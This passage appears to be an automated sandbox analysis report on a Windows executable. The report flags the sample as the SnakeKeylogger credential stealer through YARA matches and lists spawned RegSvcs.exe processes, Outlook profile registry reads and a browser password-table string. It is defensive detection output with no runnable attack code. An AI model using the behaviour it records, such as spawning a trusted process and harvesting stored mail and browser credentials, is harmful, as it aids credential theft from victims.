                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008803DA5_2_008803DA
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0083242E5_2_0083242E
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008225FA5_2_008225FA
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008166E15_2_008166E1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0085E6165_2_0085E616
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0083878F5_2_0083878F
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008688895_2_00868889
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008188085_2_00818808
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008368445_2_00836844
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008808575_2_00880857
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082CB215_2_0082CB21
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00836DB65_2_00836DB6
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00816F9E5_2_00816F9E
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008130305_2_00813030
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008231875_2_00823187
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082F1D95_2_0082F1D9
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008012875_2_00801287
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008214845_2_00821484
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008155205_2_00815520
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008276965_2_00827696
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008157605_2_00815760
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008219785_2_00821978
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00839AB55_2_00839AB5
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00821D905_2_00821D90
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082BDA65_2_0082BDA6
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00887DDB5_2_00887DDB
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00813FE05_2_00813FE0
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0080DF005_2_0080DF00
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00E562A05_2_00E562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A143288_2_00A14328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A18DA08_2_00A18DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A159788_2_00A15978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A12DE08_2_00A12DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F87608_2_050F8760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F76E88_2_050F76E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F93F88_2_050F93F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F8DA88_2_050F8DA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050FAE888_2_050FAE88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050FAB308_2_050FAB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F9A488_2_050F9A48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F65518_2_050F6551
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F65608_2_050F6560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F15E88_2_050F15E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F15F88_2_050F15F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F54008_2_050F5400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F34508_2_050F3450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F34608_2_050F3460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F048A8_2_050F048A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F04988_2_050F0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F27488_2_050F2748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F27588_2_050F2758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F76D98_2_050F76D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F46E88_2_050F46E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F46F88_2_050F46F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F61088_2_050F6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F11928_2_050F1192
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F11A08_2_050F11A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F30088_2_050F3008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F00238_2_050F0023
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F00408_2_050F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050FA0828_2_050FA082
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050FA0908_2_050FA090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F60F88_2_050F60F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F23008_2_050F2300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F93E88_2_050F93E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F53F08_2_050F53F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F42908_2_050F4290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F42A08_2_050F42A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F22F08_2_050F22F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F0D3A8_2_050F0D3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F0D488_2_050F0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F5CA08_2_050F5CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F5CB08_2_050F5CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F4F988_2_050F4F98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F4FA88_2_050F4FA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F2FF98_2_050F2FF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F3E378_2_050F3E37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F3E488_2_050F3E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F1E988_2_050F1E98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F1EA88_2_050F1EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F58498_2_050F5849
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F58588_2_050F5858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F38AA8_2_050F38AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F38B88_2_050F38B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F08E08_2_050F08E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F08F08_2_050F08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050FAB208_2_050FAB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F4B408_2_050F4B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F4B508_2_050F4B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F2BA08_2_050F2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F2BB08_2_050F2BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F6BE98_2_050F6BE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F6BF88_2_050F6BF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F9A3B8_2_050F9A3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F1A408_2_050F1A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_050F1A508_2_050F1A50
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: String function: 00828900 appears 42 times
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: String function: 00807DE1 appears 35 times
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: String function: 00820AE3 appears 70 times
                Source: JWPRnfqs3n.exe, 00000005.00000003.1325723273.0000000003773000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JWPRnfqs3n.exe
                Source: JWPRnfqs3n.exe, 00000005.00000003.1324807314.000000000391D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JWPRnfqs3n.exe
                Source: JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs JWPRnfqs3n.exe
                Source: JWPRnfqs3n.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086A06A GetLastError,FormatMessageW,5_2_0086A06A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008581CB AdjustTokenPrivileges,CloseHandle,5_2_008581CB
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_008587E1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_0086B3FB
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0087EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_0087EE0D
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_0086C397
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00804E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00804E89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeFile created: C:\Users\user~1\AppData\Local\Temp\autA514.tmpJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCommand line argument: 8o5_2_008047D0
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCommand line argument: H5_2_008047D0
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCommand line argument: H5_2_008047D0
                Source: JWPRnfqs3n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000027C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002795000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002786000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3731437525.00000000036CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.00000000027A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: JWPRnfqs3n.exeReversingLabs: Detection: 79%
                Source: JWPRnfqs3n.exeVirustotal: Detection: 66%
                Source: unknownProcess created: C:\Users\user\Desktop\JWPRnfqs3n.exe "C:\Users\user\Desktop\JWPRnfqs3n.exe"
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\JWPRnfqs3n.exe"
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\JWPRnfqs3n.exe"Jump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: JWPRnfqs3n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: JWPRnfqs3n.exe, 00000005.00000003.1324807314.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, JWPRnfqs3n.exe, 00000005.00000003.1324641312.0000000003650000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: JWPRnfqs3n.exe, 00000005.00000003.1324807314.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, JWPRnfqs3n.exe, 00000005.00000003.1324641312.0000000003650000.00000004.00001000.00020000.00000000.sdmp
                Source: JWPRnfqs3n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: JWPRnfqs3n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: JWPRnfqs3n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: JWPRnfqs3n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: JWPRnfqs3n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00804B37 LoadLibraryA,GetProcAddress,5_2_00804B37
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00828945 push ecx; ret 5_2_00828958
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_008048D7
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00885376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00885376
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00823187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00823187
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
